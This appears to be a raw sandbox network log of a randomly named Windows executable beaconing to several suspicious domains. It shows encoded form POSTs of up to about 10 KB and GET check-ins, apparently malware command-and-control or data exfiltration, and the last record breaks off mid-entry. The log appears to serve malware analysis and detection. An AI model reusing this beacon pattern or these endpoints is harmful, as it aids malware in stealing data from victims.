Sep 26, 2024 14:25:13.418822050 CEST	10846	OUT	POST /dt20/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.crowsecurity.cloud Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.crowsecurity.cloud Referer: http://www.crowsecurity.cloud/dt20/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 75 4f 62 2f 54 57 34 31 44 78 47 63 32 59 41 36 49 4b 4a 2b 31 49 43 68 30 51 4d 52 35 67 4c 6e 70 65 42 43 72 36 56 43 49 31 31 57 57 32 79 73 78 71 61 6d 6f 30 64 61 50 79 44 66 43 32 70 63 6e 33 50 77 44 4e 53 5a 50 62 74 6a 71 32 37 72 68 30 6e 55 6e 45 76 37 6a 5a 39 5a 54 76 38 79 4e 56 66 6b 57 65 53 33 4b 6f 67 6f 4a 52 4d 72 56 4e 71 41 45 4e 4f 5a 75 6f 50 4c 6c 56 69 70 7a 31 34 64 6d 53 2b 58 46 43 76 76 43 41 58 34 64 33 79 33 79 30 7a 79 4d 51 35 49 2b 35 6f 66 52 73 55 30 6e 4c 79 2f 6a 78 77 61 43 48 6a 69 49 51 46 77 44 38 72 69 76 71 72 48 7a 62 32 65 62 68 4a 65 61 31 72 44 61 6b 67 75 6a 57 62 6a 50 4c 6e 41 4c 37 62 54 79 7a 61 77 66 49 70 4d 4e 36 4f 39 4a 53 79 54 4f 4d 78 6b 41 58 4b 59 6b 47 4c 75 56 64 47 64 51 6a 58 31 63 51 2b 4f 45 79 44 55 51 7a 30 77 4f 33 46 33 58 7a 70 56 63 73 35 65 54 68 6a 4f 63 6f 7a 30 37 41 47 4e 33 7a 77 72 38 7a 30 65 51 46 61 54 50 68 42 6d 72 74 63 55 4c 65 46 6e 62 45 4e 78 41 33 48 61 71 31 6c 70 4e 57 31 52 63 44 4c [TRUNCATED] Data Ascii: sL9tFJ=uOb/TW41DxGc2YA6IKJ+1ICh0QMR5gLnpeBCr6VCI11WW2ysxqamo0daPyDfC2pcn3PwDNSZPbtjq27rh0nUnEv7jZ9ZTv8yNVfkWeS3KogoJRMrVNqAENOZuoPLlVipz14dmS+XFCvvCAX4d3y3y0zyMQ5I+5ofRsU0nLy/jxwaCHjiIQFwD8rivqrHzb2ebhJea1rDakgujWbjPLnAL7bTyzawfIpMN6O9JSyTOMxkAXKYkGLuVdGdQjX1cQ+OEyDUQz0wO3F3XzpVcs5eThjOcoz07AGN3zwr8z0eQFaTPhBmrtcULeFnbENxA3Haq1lpNW1RcDLFOsKbNHGmjXfRvArZ6wZzhr2KkcVsmuJJiXDVKrbFB5g/zAt9mt7HRwDyaXK4b0ybWIFd/xHyZ5nO9LrNvHiWq9qJxMN6Il3MYboV3bk7A0X1pFo9IjB226C9U7xy5Rr3p5ilnt/hpnaqfaYbna78X+hc5bF1ozyET472ritNBJd0S6XgKq/hzt1XveDWLb4+16yjUQOlufYyYF5aAOSSxGvCuEluGYpL9qaAm8oeEZ+YU/0JshPFVx3IfyPpMd4hF4uvGsR47A8H3YXWpktKL0aqNM2Gk5lIRZoEMcecog9BI8uEMgSG+y1EVOe4hrvtIPLBiR2wL9wjqy1B38qAPhA++7WzfYxs7eCSTI1+6NGFG5k/SwlzwQiJgk9JTKp8jpSFoxHLM5SjMNFEC50KBZhuMrFoUkY3yGH+2Ftag6AehxTgsKwkkMkFCLrr+4nA73qvrNCHpuGhYeFD2OP6VMtfX4J8QzqvCvgwK1L+6W29Z3BMtwc3jLdZLOu5dOJnb4OtM089oQ+yVfEPs2BlXhDte9BGxdxInlc4dMoNMR4Zl4RL0zV5/0ZkBSVp3VhychWVNrPZrmSS7vPekqgRYSCH6sniQKO3f+l2pUVLw1uzRokHm11mdwN/oPdeYUz6A+iCC8KiZCyHA4i/n1Nmn72DZCbgRSGoE [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49763	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:15.962922096 CEST	466	OUT	GET /dt20/?sL9tFJ=jMzfQmQmIDSzouF6Lox+3L2FgGYq5APQ95A7i7hmDDVLCGCM44ipqB5JCC3ZLSV4hUu+HvHwJbctiEvq8GXK62TkioYWTvl/FFz4Ja2JDvEPYzlsAsi7VtI=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.crowsecurity.cloud Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:25:16.412554979 CEST	396	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 12:25:16 GMT Content-Type: text/html Content-Length: 256 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 4c 39 74 46 4a 3d 6a 4d 7a 66 51 6d 51 6d 49 44 53 7a 6f 75 46 36 4c 6f 78 2b 33 4c 32 46 67 47 59 71 35 41 50 51 39 35 41 37 69 37 68 6d 44 44 56 4c 43 47 43 4d 34 34 69 70 71 42 35 4a 43 43 33 5a 4c 53 56 34 68 55 75 2b 48 76 48 77 4a 62 63 74 69 45 76 71 38 47 58 4b 36 32 54 6b 69 6f 59 57 54 76 6c 2f 46 46 7a 34 4a 61 32 4a 44 76 45 50 59 7a 6c 73 41 73 69 37 56 74 49 3d 26 67 42 37 74 3d 78 46 71 58 31 68 43 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sL9tFJ=jMzfQmQmIDSzouF6Lox+3L2FgGYq5APQ95A7i7hmDDVLCGCM44ipqB5JCC3ZLSV4hUu+HvHwJbctiEvq8GXK62TkioYWTvl/FFz4Ja2JDvEPYzlsAsi7VtI=&gB7t=xFqX1hC8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	103.255.237.233	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:22.271614075 CEST	753	OUT	POST /ctkk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.languyenthuyduyen.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.languyenthuyduyen.xyz Referer: http://www.languyenthuyduyen.xyz/ctkk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 70 4e 4b 56 76 79 74 44 74 72 75 6e 32 65 6f 46 56 73 65 78 56 35 49 30 42 38 69 59 38 72 31 54 68 41 70 57 74 43 74 79 6f 4e 58 59 57 61 57 6e 61 42 75 51 78 48 42 47 39 4e 46 32 70 72 77 42 38 36 53 4c 78 42 76 76 4a 55 6d 72 54 64 69 73 50 4b 6e 54 6b 43 37 54 54 52 5a 49 4a 61 6e 38 65 64 76 79 47 58 65 4b 43 53 39 7a 6a 73 70 6a 4d 42 77 58 2b 2f 50 78 77 4a 4f 34 5a 62 46 68 51 57 42 6f 45 4c 32 71 77 57 4b 39 2b 48 54 67 41 64 56 4f 6e 6b 51 4e 30 7a 4f 4a 41 54 39 72 79 4b 4e 59 37 6c 67 38 53 37 4e 52 74 78 30 65 55 65 43 65 34 43 35 6e 5a 73 31 2b 36 41 49 37 73 77 3d 3d Data Ascii: sL9tFJ=pNKVvytDtrun2eoFVsexV5I0B8iY8r1ThApWtCtyoNXYWaWnaBuQxHBG9NF2prwB86SLxBvvJUmrTdisPKnTkC7TTRZIJan8edvyGXeKCS9zjspjMBwX+/PxwJO4ZbFhQWBoEL2qwWK9+HTgAdVOnkQN0zOJAT9ryKNY7lg8S7NRtx0eUeCe4C5nZs1+6AI7sw==
Sep 26, 2024 14:25:23.195588112 CEST	959	IN	HTTP/1.1 302 Found Server: openresty Date: Thu, 26 Sep 2024 12:25:23 GMT Content-Type: text/html Content-Length: 683 Connection: close Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49765	103.255.237.233	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:24.823091984 CEST	773	OUT	POST /ctkk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.languyenthuyduyen.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.languyenthuyduyen.xyz Referer: http://www.languyenthuyduyen.xyz/ctkk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 70 4e 4b 56 76 79 74 44 74 72 75 6e 33 2b 59 46 54 4e 65 78 51 5a 49 7a 4f 63 69 59 70 37 30 61 68 42 56 57 74 44 59 33 6f 2b 7a 59 58 36 6d 6e 62 41 75 51 32 48 42 47 31 74 46 33 32 37 77 77 38 36 66 72 78 41 54 76 4a 55 79 72 54 59 65 73 50 39 62 51 6c 53 37 72 47 42 5a 4b 4e 61 6e 38 65 64 76 79 47 58 4b 6b 43 57 52 7a 6b 63 35 6a 4b 6b 51 49 7a 66 50 77 7a 4a 4f 34 64 62 46 62 51 57 41 4e 45 4b 71 51 77 55 69 39 2b 47 44 67 42 49 68 4e 2b 55 51 4c 70 6a 50 71 44 68 52 6d 2f 4c 6b 62 34 33 38 6c 63 4b 70 4e 73 33 6c 45 46 76 6a 4a 71 43 64 55 45 72 38 4b 33 44 31 79 33 34 77 45 30 48 67 79 46 77 42 65 37 43 43 4e 70 30 42 51 52 58 41 3d Data Ascii: sL9tFJ=pNKVvytDtrun3+YFTNexQZIzOciYp70ahBVWtDY3o+zYX6mnbAuQ2HBG1tF327ww86frxATvJUyrTYesP9bQlS7rGBZKNan8edvyGXKkCWRzkc5jKkQIzfPwzJO4dbFbQWANEKqQwUi9+GDgBIhN+UQLpjPqDhRm/Lkb438lcKpNs3lEFvjJqCdUEr8K3D1y34wE0HgyFwBe7CCNp0BQRXA=
Sep 26, 2024 14:25:25.751118898 CEST	959	IN	HTTP/1.1 302 Found Server: openresty Date: Thu, 26 Sep 2024 12:25:25 GMT Content-Type: text/html Content-Length: 683 Connection: close Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49766	103.255.237.233	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:27.374928951 CEST	10855	OUT	POST /ctkk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.languyenthuyduyen.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.languyenthuyduyen.xyz Referer: http://www.languyenthuyduyen.xyz/ctkk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 70 4e 4b 56 76 79 74 44 74 72 75 6e 33 2b 59 46 54 4e 65 78 51 5a 49 7a 4f 63 69 59 70 37 30 61 68 42 56 57 74 44 59 33 6f 2b 37 59 58 4a 75 6e 61 6e 43 51 33 48 42 47 30 74 46 79 32 37 77 58 38 36 48 6e 78 41 65 61 4a 58 4b 72 54 36 6d 73 65 5a 50 51 72 53 37 72 5a 78 5a 4a 4a 61 6e 70 65 5a 43 37 47 58 61 6b 43 57 52 7a 6b 61 46 6a 4b 78 77 49 78 66 50 78 77 4a 4f 4b 5a 62 45 56 51 57 59 33 45 4c 66 74 78 6b 43 39 2b 6d 7a 67 4d 65 39 4e 33 55 51 4a 36 54 50 4d 44 68 63 6d 2f 4c 34 78 34 32 49 66 63 4a 31 4e 76 78 6c 65 65 74 2f 6c 34 79 35 62 41 35 49 75 79 78 35 30 38 34 67 38 30 6b 4d 74 52 52 39 32 32 42 32 48 38 78 46 54 4c 79 31 68 31 46 73 57 54 44 6c 78 46 6c 69 48 64 74 6c 53 44 64 4f 55 69 75 42 48 4c 68 2b 39 48 44 78 52 70 77 6f 63 4b 2f 37 63 77 47 76 76 35 31 72 4f 34 57 68 4d 66 2f 75 72 6a 7a 31 52 6d 79 45 6c 57 30 2b 74 30 4e 78 35 69 6d 54 2f 4f 64 49 62 6c 68 69 70 63 77 42 79 2b 57 48 52 32 2f 59 63 79 71 53 7a 58 6d 69 37 72 47 32 4b 2f 78 79 52 36 48 46 [TRUNCATED] Data Ascii: sL9tFJ=pNKVvytDtrun3+YFTNexQZIzOciYp70ahBVWtDY3o+7YXJunanCQ3HBG0tFy27wX86HnxAeaJXKrT6mseZPQrS7rZxZJJanpeZC7GXakCWRzkaFjKxwIxfPxwJOKZbEVQWY3ELftxkC9+mzgMe9N3UQJ6TPMDhcm/L4x42IfcJ1Nvxleet/l4y5bA5Iuyx5084g80kMtRR922B2H8xFTLy1h1FsWTDlxFliHdtlSDdOUiuBHLh+9HDxRpwocK/7cwGvv51rO4WhMf/urjz1RmyElW0+t0Nx5imT/OdIblhipcwBy+WHR2/YcyqSzXmi7rG2K/xyR6HFYyUw+SanhfDS2+SqMrce6nbGtwirIr/Yp8JG/tuZKGq7YCmoZjAHlRu5m7OH+Ugic+uG9WN1m7e7ZL6+dFWzRdKAnYam+DKQbTwsVZOp8X9qySCnnbuQMb0DkPlDax/sL3l4t/dh5O5DsZ2iOVIec1qogNIqPlIdhak4oKJIUGh1JgnI2WXnBlzuv5NkvDizFlt7a/h823cJwntEOhDX+Z8ko0tm0ztmwu06mVFg9jVPGIJ/ifdox4wIgv7AokShNYaOq9QO2V0NPKE0fYCtUKMRyeeBMULVO7/ZBqkvTS6VLLfEtdsQO1TmHiuIc4lIG7YGmm/OBsrCZPkEp+lriVOyfTWkco9MD6paH0/ix5pfqjiMI4jA4uIIzbYCqyBXgIOiIeifUeEmFCo/eiDosgWu4i+Xai6f1ao4qrf+IrqNP+7oPP9nWDimZpDjG1YCR44u+u6DrxaVft2qj6/rkFfFcqX6XdKin/AKnIrBycnEzwGf1viNZZS2GxFPy5eblgy5GP6QNJRUS8TEezdgh57Rqy9uPUIckXYM/TV18tq2LzJTRpgOVcsN9yOqkgwBkFAOvNN4/tRPIui4jOqNtJlZ/UlaVIhPwuwfA8K1nAgMtZTBjAx/PtTgpIJSm1UF50pVgRZxrLpsPIiqk+f7a6HR7QPV4FdydN [TRUNCATED]
Sep 26, 2024 14:25:28.535140038 CEST	959	IN	HTTP/1.1 302 Found Server: openresty Date: Thu, 26 Sep 2024 12:25:28 GMT Content-Type: text/html Content-Length: 683 Connection: close Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49767	103.255.237.233	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:29.918879032 CEST	469	OUT	GET /ctkk/?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028ENKix9xnpjaLK+rUCaExClfx8VOmsMg4q/F6QibXlvsba63eJfmkGHAexdCL7DaV+OKMxuUWRxpipB6VVsrtbE=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.languyenthuyduyen.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:25:30.879105091 CEST	1101	IN	HTTP/1.1 302 Found Server: openresty Date: Thu, 26 Sep 2024 12:25:30 GMT Content-Type: text/html Content-Length: 683 Connection: close Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028ENKix9xnpjaLK+rUCaExClfx8VOmsMg4q/F6QibXlvsba63eJfmkGHAexdCL7DaV+OKMxuUWRxpipB6VVsrtbE=&gB7t=xFqX1hC8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49768	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:35.952838898 CEST	723	OUT	POST /oigd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.comrade.lol Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.comrade.lol Referer: http://www.comrade.lol/oigd/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 61 6c 44 74 72 49 66 56 58 30 6e 6a 30 6c 38 41 61 33 78 59 66 59 6e 72 71 4f 50 64 6f 44 57 49 51 36 55 74 4c 31 7a 54 45 6f 79 58 56 47 72 59 52 47 6d 62 79 63 71 51 4f 2b 6f 56 48 2f 46 52 55 6e 6a 32 62 77 68 51 43 36 63 69 6d 4f 35 4a 71 49 4b 6a 31 59 2b 56 6f 49 36 35 49 51 7a 33 78 5a 4b 4e 54 2f 4c 58 59 4f 5a 36 75 66 33 56 49 69 4a 33 45 46 6a 49 6b 66 5a 4c 43 7a 52 42 33 68 6b 6b 6f 6e 78 4f 76 79 4b 74 4b 62 73 35 7a 6f 54 52 4b 30 64 39 39 66 56 2f 52 4f 31 45 65 57 37 41 49 73 56 62 2b 6e 78 58 50 2b 39 67 68 72 65 6d 6c 74 52 77 45 76 79 47 35 5a 47 74 53 41 3d 3d Data Ascii: 